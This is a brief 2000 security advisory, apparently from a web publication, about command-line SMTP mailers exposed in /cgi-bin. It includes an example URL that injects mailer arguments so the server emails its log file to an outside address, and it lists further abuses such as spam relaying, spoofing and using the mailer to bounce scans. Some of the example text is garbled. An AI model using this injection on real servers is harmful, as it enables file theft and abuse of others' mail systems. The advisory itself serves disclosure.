Skip navigation

Multiple Command Line SMTP Mailers Contain Vulnerabilities

Reported December 12, 2000 by XATO



Multiple vulnerabilities have been discovered in command-line mailers. Vulnerabilities range from Denial of Service (DoS) attacks to information leakage and the writing and retrieving of unauthorized data.


If the mailer software is located in the /cgi-bin directory on the Web server, a user can launch it with the following URL:


By adding a "-h" to the URL, as seen below, a user obtains a list of available options built into the mailer:


The following command causes the mailer software to email the malicious user any file specified. In the case of this example, the Web server emails log files.

-f%[email protected]%20-t%[email protected]">http://yourserver/cgi-bin/mailer.exe?-f%20

[email protected]%20-t%[email protected] com%20-a%20c:\logs\web.log 

Other issues discovered with the command-line mailer programs include the mailers also let malicious users specify the recipient and the sender, letting anyone use the server for unsolicited commercial email (UCE), flooding, mail bombing, resource draining, mail spoofing, and DoS. 

Additionally, other problems include the ability to let INI and log files reside in the same directory as the mailer; override the default settings; modify hidden form variables; exploit debug modes; monitor all mail sent through the server; use the mailer as a bounce point for port scans; use the mailer as a bounce point for brute-force password attacks.


Check your vendors web site for fix and upgrade information.

Discovered by

Hide comments


  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.